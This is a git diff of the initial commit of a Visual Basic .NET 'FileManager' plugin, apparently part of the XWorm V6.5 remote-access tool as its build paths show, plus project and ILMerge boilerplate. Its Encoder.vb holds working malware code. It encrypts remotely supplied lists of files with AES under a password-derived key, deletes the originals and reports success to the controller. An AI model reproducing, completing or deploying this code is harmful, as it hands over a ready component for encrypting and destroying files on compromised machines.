initial commit
This commit is contained in:
Binary file not shown.
@@ -0,0 +1,22 @@
|
||||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 14
|
||||
VisualStudioVersion = 14.0.25420.1
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "FileManager", "FileManager\FileManager.vbproj", "{3A732395-AA05-4B2D-8919-3E5F374833DB}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{3A732395-AA05-4B2D-8919-3E5F374833DB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{3A732395-AA05-4B2D-8919-3E5F374833DB}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{3A732395-AA05-4B2D-8919-3E5F374833DB}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{3A732395-AA05-4B2D-8919-3E5F374833DB}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
||||
@@ -0,0 +1 @@
|
||||
{"RootPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\FileManager\\FileManager","ProjectFileName":"FileManager.vbproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[{"SourceFile":"Plugin.vb"},{"SourceFile":"Encoder.vb"},{"SourceFile":"My Project\\AssemblyInfo.vb"},{"SourceFile":"My Project\\Application.Designer.vb"},{"SourceFile":"My Project\\Resources.Designer.vb"},{"SourceFile":"My Project\\Settings.Designer.vb"},{"SourceFile":"obj\\Debug\\.NETFramework,Version=v4.8.AssemblyAttributes.vb"}],"References":[{"Reference":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\FileManager\\Interop.WMPLib.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\FileManager\\FileManager\\Microsoft.WindowsAPICodePack.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\FileManager\\FileManager\\Microsoft.WindowsAPICodePack.Shell.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Core.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.DataSetExtensions.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Drawing.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Windows.Forms.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.Linq.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""}],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\XWorm\\bin\\Debug\\Plugins\\FileManager.dll","OutputItemRelativePath":"FileManager.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}
|
||||
@@ -0,0 +1,179 @@
|
||||
Imports System.IO
|
||||
Imports System.Security.Cryptography
|
||||
|
||||
Public Class Encoder
|
||||
|
||||
Public Shared fsInput As System.IO.FileStream
|
||||
Public Shared fsOutput As System.IO.FileStream
|
||||
Public Shared bytKey As Byte()
|
||||
Public Shared bytIV As Byte()
|
||||
|
||||
Public Shared Sub DEC(ByVal pass As Object, ByVal path As Object)
|
||||
Try
|
||||
bytKey = CreateKey(pass)
|
||||
bytIV = CreateIV(pass)
|
||||
Catch ex As Exception
|
||||
End Try
|
||||
|
||||
For Each XX In Strings.Split(path, ("-=>"))
|
||||
Try
|
||||
If XX.EndsWith(".ENC") Then
|
||||
If IO.File.Exists(XX) Then
|
||||
DecryptFile(XX, XX.Replace(".ENC", ""), bytKey, bytIV, CryptoAction.ActionDecrypt)
|
||||
SendMsg(IO.Path.GetFileName(XX) & " Decrypted Successfully")
|
||||
GC.Collect()
|
||||
End If
|
||||
End If
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
Next
|
||||
End Sub
|
||||
|
||||
Public Shared Sub ENC(ByVal pass As Object, ByVal path As Object)
|
||||
Try
|
||||
bytKey = CreateKey(pass)
|
||||
bytIV = CreateIV(pass)
|
||||
Catch ex As Exception
|
||||
End Try
|
||||
|
||||
For Each XX In Strings.Split(path, ("-=>"))
|
||||
Try
|
||||
If XX.EndsWith(".ENC") Then
|
||||
Else
|
||||
If IO.File.Exists(XX) Then
|
||||
EncryptOrDecryptFile(XX, XX & ".ENC", bytKey, bytIV, CryptoAction.ActionEncrypt)
|
||||
SendMsg(IO.Path.GetFileName(XX) & " Encrypted Successfully")
|
||||
GC.Collect()
|
||||
End If
|
||||
End If
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
Next
|
||||
End Sub
|
||||
Public Enum CryptoAction
|
||||
ActionEncrypt = 1
|
||||
ActionDecrypt = 2
|
||||
End Enum
|
||||
|
||||
Public Shared Sub EncryptOrDecryptFile(ByVal strInputFile As String,
|
||||
ByVal strOutputFile As String,
|
||||
ByVal bytKey() As Byte,
|
||||
ByVal bytIV() As Byte,
|
||||
ByVal Direction As CryptoAction)
|
||||
|
||||
On Error Resume Next
|
||||
fsInput = New System.IO.FileStream(strInputFile, FileMode.Open,
|
||||
FileAccess.Read)
|
||||
fsOutput = New System.IO.FileStream(strOutputFile, FileMode.OpenOrCreate,
|
||||
FileAccess.Write)
|
||||
fsOutput.SetLength(0)
|
||||
|
||||
Dim bytBuffer(4096) As Byte
|
||||
Dim lngBytesProcessed As Long = 0
|
||||
Dim lngFileLength As Long = fsInput.Length
|
||||
Dim intBytesInCurrentBlock As Integer
|
||||
Dim csCryptoStream As CryptoStream
|
||||
Dim cspRijndael As New System.Security.Cryptography.RijndaelManaged
|
||||
Select Case Direction
|
||||
Case CryptoAction.ActionEncrypt
|
||||
csCryptoStream = New CryptoStream(fsOutput,
|
||||
cspRijndael.CreateEncryptor(bytKey, bytIV),
|
||||
CryptoStreamMode.Write)
|
||||
End Select
|
||||
While lngBytesProcessed < lngFileLength
|
||||
intBytesInCurrentBlock = fsInput.Read(bytBuffer, 0, 4096)
|
||||
csCryptoStream.Write(bytBuffer, 0, intBytesInCurrentBlock)
|
||||
lngBytesProcessed = lngBytesProcessed + CLng(intBytesInCurrentBlock)
|
||||
End While
|
||||
csCryptoStream.Close()
|
||||
fsInput.Close()
|
||||
fsOutput.Close()
|
||||
If Direction = CryptoAction.ActionEncrypt Then
|
||||
Dim fileOriginal As New FileInfo(strInputFile)
|
||||
fileOriginal.Delete()
|
||||
End If
|
||||
End Sub
|
||||
Public Shared Sub DecryptFile(ByVal strInputFile As String,
|
||||
ByVal strOutputFile As String,
|
||||
ByVal bytKey() As Byte,
|
||||
ByVal bytIV() As Byte,
|
||||
ByVal Direction As CryptoAction)
|
||||
|
||||
On Error Resume Next
|
||||
fsInput = New System.IO.FileStream(strInputFile, FileMode.Open,
|
||||
FileAccess.Read)
|
||||
fsOutput = New System.IO.FileStream(strOutputFile, FileMode.OpenOrCreate,
|
||||
FileAccess.Write)
|
||||
fsOutput.SetLength(0)
|
||||
|
||||
|
||||
Dim bytBuffer(4096) As Byte
|
||||
Dim lngBytesProcessed As Long = 0
|
||||
Dim lngFileLength As Long = fsInput.Length
|
||||
Dim intBytesInCurrentBlock As Integer
|
||||
Dim csCryptoStream As CryptoStream
|
||||
|
||||
Dim cspRijndael As New System.Security.Cryptography.RijndaelManaged
|
||||
Select Case Direction
|
||||
|
||||
Case CryptoAction.ActionDecrypt
|
||||
csCryptoStream = New CryptoStream(fsOutput,
|
||||
cspRijndael.CreateDecryptor(bytKey, bytIV),
|
||||
CryptoStreamMode.Write)
|
||||
End Select
|
||||
|
||||
While lngBytesProcessed < lngFileLength
|
||||
|
||||
intBytesInCurrentBlock = fsInput.Read(bytBuffer, 0, 4096)
|
||||
|
||||
csCryptoStream.Write(bytBuffer, 0, intBytesInCurrentBlock)
|
||||
|
||||
lngBytesProcessed = lngBytesProcessed + CLng(intBytesInCurrentBlock)
|
||||
|
||||
End While
|
||||
csCryptoStream.Close()
|
||||
fsInput.Close()
|
||||
fsOutput.Close()
|
||||
If Direction = CryptoAction.ActionDecrypt Then
|
||||
Dim fileEncrypted As New FileInfo(strInputFile)
|
||||
fileEncrypted.Delete()
|
||||
End If
|
||||
If Direction = CryptoAction.ActionDecrypt Then
|
||||
Dim fileDelete As New FileInfo(strInputFile)
|
||||
fileDelete.Delete()
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Public Shared Function CreateKey(ByVal strPassword As String) As Byte()
|
||||
Dim chrData() As Char = strPassword.ToCharArray
|
||||
Dim intLength As Integer = chrData.GetUpperBound(0)
|
||||
Dim bytDataToHash(intLength) As Byte
|
||||
For i As Integer = 0 To chrData.GetUpperBound(0)
|
||||
bytDataToHash(i) = CByte(Asc(chrData(i)))
|
||||
Next
|
||||
Dim SHA512 As New System.Security.Cryptography.SHA512Managed
|
||||
Dim bytResult As Byte() = SHA512.ComputeHash(bytDataToHash)
|
||||
Dim bytKey(31) As Byte
|
||||
For i As Integer = 0 To 31
|
||||
bytKey(i) = bytResult(i)
|
||||
Next
|
||||
Return bytKey
|
||||
End Function
|
||||
Public Shared Function CreateIV(ByVal strPassword As String) As Byte()
|
||||
Dim chrData() As Char = strPassword.ToCharArray
|
||||
Dim intLength As Integer = chrData.GetUpperBound(0)
|
||||
Dim bytDataToHash(intLength) As Byte
|
||||
For i As Integer = 0 To chrData.GetUpperBound(0)
|
||||
bytDataToHash(i) = CByte(Asc(chrData(i)))
|
||||
Next
|
||||
Dim SHA512 As New System.Security.Cryptography.SHA512Managed
|
||||
Dim bytResult As Byte() = SHA512.ComputeHash(bytDataToHash)
|
||||
Dim bytIV(15) As Byte
|
||||
For i As Integer = 32 To 47
|
||||
bytIV(i - 32) = bytResult(i)
|
||||
Next
|
||||
Return bytIV
|
||||
End Function
|
||||
End Class
|
||||
@@ -0,0 +1,146 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
|
||||
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{3A732395-AA05-4B2D-8919-3E5F374833DB}</ProjectGuid>
|
||||
<OutputType>Library</OutputType>
|
||||
<RootNamespace>Plugin</RootNamespace>
|
||||
<AssemblyName>FileManager</AssemblyName>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<MyType>Windows</MyType>
|
||||
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
|
||||
<NuGetPackageImportStamp>
|
||||
</NuGetPackageImportStamp>
|
||||
<TargetFrameworkProfile />
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<DebugSymbols>false</DebugSymbols>
|
||||
<DebugType>none</DebugType>
|
||||
<DefineDebug>true</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<OutputPath>..\..\..\XWorm\bin\Debug\Plugins\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<Prefer32Bit>false</Prefer32Bit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<DefineDebug>false</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DocumentationFile>
|
||||
</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
<Prefer32Bit>false</Prefer32Bit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionExplicit>On</OptionExplicit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionCompare>Binary</OptionCompare>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionStrict>Off</OptionStrict>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionInfer>On</OptionInfer>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="Interop.WMPLib">
|
||||
<HintPath>..\Interop.WMPLib.dll</HintPath>
|
||||
<EmbedInteropTypes>True</EmbedInteropTypes>
|
||||
</Reference>
|
||||
<Reference Include="Microsoft.WindowsAPICodePack">
|
||||
<HintPath>.\Microsoft.WindowsAPICodePack.dll</HintPath>
|
||||
</Reference>
|
||||
<Reference Include="Microsoft.WindowsAPICodePack.Shell">
|
||||
<HintPath>.\Microsoft.WindowsAPICodePack.Shell.dll</HintPath>
|
||||
</Reference>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Drawing" />
|
||||
<Reference Include="System.Windows.Forms" />
|
||||
<Reference Include="System.Xml" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Import Include="Microsoft.VisualBasic" />
|
||||
<Import Include="System" />
|
||||
<Import Include="System.Collections" />
|
||||
<Import Include="System.Collections.Generic" />
|
||||
<Import Include="System.Data" />
|
||||
<Import Include="System.Diagnostics" />
|
||||
<Import Include="System.Linq" />
|
||||
<Import Include="System.Xml.Linq" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Plugin.vb" />
|
||||
<Compile Include="Encoder.vb" />
|
||||
<Compile Include="My Project\AssemblyInfo.vb" />
|
||||
<Compile Include="My Project\Application.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Application.myapp</DependentUpon>
|
||||
<DesignTime>True</DesignTime>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Resources.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DesignTime>True</DesignTime>
|
||||
<DependentUpon>Resources.resx</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Settings.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Settings.settings</DependentUpon>
|
||||
<DesignTimeSharedInput>True</DesignTimeSharedInput>
|
||||
</Compile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<EmbeddedResource Include="My Project\Resources.resx">
|
||||
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
|
||||
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
|
||||
<CustomToolNamespace>My.Resources</CustomToolNamespace>
|
||||
<SubType>Designer</SubType>
|
||||
</EmbeddedResource>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="ILMerge.props" />
|
||||
<None Include="My Project\Application.myapp">
|
||||
<Generator>MyApplicationCodeGenerator</Generator>
|
||||
<LastGenOutput>Application.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="My Project\Settings.settings">
|
||||
<Generator>SettingsSingleFileGenerator</Generator>
|
||||
<CustomToolNamespace>My</CustomToolNamespace>
|
||||
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="packages.config" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Content Include="ILMergeOrder.txt" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
|
||||
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
|
||||
<PropertyGroup>
|
||||
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
|
||||
</PropertyGroup>
|
||||
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
|
||||
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
|
||||
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
|
||||
</Target>
|
||||
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
|
||||
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
|
||||
Other similar extension points exist, see Microsoft.Common.targets.
|
||||
<Target Name="BeforeBuild">
|
||||
</Target>
|
||||
<Target Name="AfterBuild">
|
||||
</Target>
|
||||
-->
|
||||
</Project>
|
||||
@@ -0,0 +1,67 @@
|
||||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<!-- -->
|
||||
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
|
||||
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
|
||||
<!-- -->
|
||||
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
|
||||
|
||||
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
|
||||
<ILMergeTransitive>true</ILMergeTransitive>
|
||||
|
||||
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
|
||||
<ILMergeLibraryPath></ILMergeLibraryPath>
|
||||
|
||||
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
|
||||
<ILMergePackagesPath></ILMergePackagesPath>
|
||||
|
||||
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
|
||||
<ILMergeOrderFile></ILMergeOrderFile>
|
||||
|
||||
<!-- The strong key file name if not specified in the project -->
|
||||
<ILMergeKeyFile></ILMergeKeyFile>
|
||||
|
||||
<!-- The assembly version if differs for the version of the main assembly -->
|
||||
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
|
||||
|
||||
<!-- added in Version 1.0.4 -->
|
||||
<ILMergeFileAlignment></ILMergeFileAlignment>
|
||||
|
||||
<!-- added in Version 1.0.4, default=none -->
|
||||
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
|
||||
|
||||
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
|
||||
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
|
||||
|
||||
<!-- See ILMerge documentation -->
|
||||
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
|
||||
|
||||
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
|
||||
<ILMergeCopyAttributes></ILMergeCopyAttributes>
|
||||
|
||||
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
|
||||
<ILMergeDebugInfo>false</ILMergeDebugInfo>
|
||||
|
||||
<!-- Target assembly will be delay signed -->
|
||||
<ILMergeDelaySign></ILMergeDelaySign>
|
||||
|
||||
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
|
||||
<ILMergeInternalize></ILMergeInternalize>
|
||||
|
||||
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
|
||||
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
|
||||
|
||||
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
|
||||
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
|
||||
|
||||
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
|
||||
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
|
||||
|
||||
<!-- Types with the same name are all merged into a single type in the target assembly -->
|
||||
<ILMergeUnionMerge></ILMergeUnionMerge>
|
||||
|
||||
<!-- The version of the target framework, default 40 (works for 45 too) -->
|
||||
<ILTargetPlatform></ILTargetPlatform>
|
||||
</PropertyGroup>
|
||||
</Project>
|
||||
@@ -0,0 +1,4 @@
|
||||
# this file contains the partial list of the merged assemblies in the merge order
|
||||
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
|
||||
# and finetune merge order to your satisfaction
|
||||
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,13 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
@@ -0,0 +1,10 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||||
<MySubMain>false</MySubMain>
|
||||
<SingleInstance>false</SingleInstance>
|
||||
<ShutdownMode>0</ShutdownMode>
|
||||
<EnableVisualStyles>true</EnableVisualStyles>
|
||||
<AuthenticationMode>0</AuthenticationMode>
|
||||
<ApplicationType>1</ApplicationType>
|
||||
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
|
||||
</MyApplicationData>
|
||||
@@ -0,0 +1,35 @@
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
Imports System.Runtime.InteropServices
|
||||
|
||||
' General Information about an assembly is controlled through the following
|
||||
' set of attributes. Change these attribute values to modify the information
|
||||
' associated with an assembly.
|
||||
|
||||
' Review the values of the assembly attributes
|
||||
|
||||
<Assembly: AssemblyTitle("FileManager")>
|
||||
<Assembly: AssemblyDescription("")>
|
||||
<Assembly: AssemblyCompany("")>
|
||||
<Assembly: AssemblyProduct("FileManager")>
|
||||
<Assembly: AssemblyCopyright("Copyright © 2022")>
|
||||
<Assembly: AssemblyTrademark("")>
|
||||
|
||||
<Assembly: ComVisible(False)>
|
||||
|
||||
'The following GUID is for the ID of the typelib if this project is exposed to COM
|
||||
<Assembly: Guid("cd904d9d-3919-4ace-a402-5a2a633daf0e")>
|
||||
|
||||
' Version information for an assembly consists of the following four values:
|
||||
'
|
||||
' Major Version
|
||||
' Minor Version
|
||||
' Build Number
|
||||
' Revision
|
||||
'
|
||||
' You can specify all the values or you can default the Build and Revision Numbers
|
||||
' by using the '*' as shown below:
|
||||
' <Assembly: AssemblyVersion("1.0.*")>
|
||||
|
||||
<Assembly: AssemblyVersion("1.0.0.0")>
|
||||
<Assembly: AssemblyFileVersion("1.0.0.0")>
|
||||
@@ -0,0 +1,63 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
|
||||
Namespace My.Resources
|
||||
|
||||
'This class was auto-generated by the StronglyTypedResourceBuilder
|
||||
'class via a tool like ResGen or Visual Studio.
|
||||
'To add or remove a member, edit your .ResX file then rerun ResGen
|
||||
'with the /str option, or rebuild your VS project.
|
||||
'''<summary>
|
||||
''' A strongly-typed resource class, for looking up localized strings, etc.
|
||||
'''</summary>
|
||||
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
|
||||
Friend Module Resources
|
||||
|
||||
Private resourceMan As Global.System.Resources.ResourceManager
|
||||
|
||||
Private resourceCulture As Global.System.Globalization.CultureInfo
|
||||
|
||||
'''<summary>
|
||||
''' Returns the cached ResourceManager instance used by this class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
|
||||
Get
|
||||
If Object.ReferenceEquals(resourceMan, Nothing) Then
|
||||
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Plugin.Resources", GetType(Resources).Assembly)
|
||||
resourceMan = temp
|
||||
End If
|
||||
Return resourceMan
|
||||
End Get
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Overrides the current thread's CurrentUICulture property for all
|
||||
''' resource lookups using this strongly typed resource class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend Property Culture() As Global.System.Globalization.CultureInfo
|
||||
Get
|
||||
Return resourceCulture
|
||||
End Get
|
||||
Set
|
||||
resourceCulture = value
|
||||
End Set
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,117 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<root>
|
||||
<!--
|
||||
Microsoft ResX Schema
|
||||
|
||||
Version 2.0
|
||||
|
||||
The primary goals of this format is to allow a simple XML format
|
||||
that is mostly human readable. The generation and parsing of the
|
||||
various data types are done through the TypeConverter classes
|
||||
associated with the data types.
|
||||
|
||||
Example:
|
||||
|
||||
... ado.net/XML headers & schema ...
|
||||
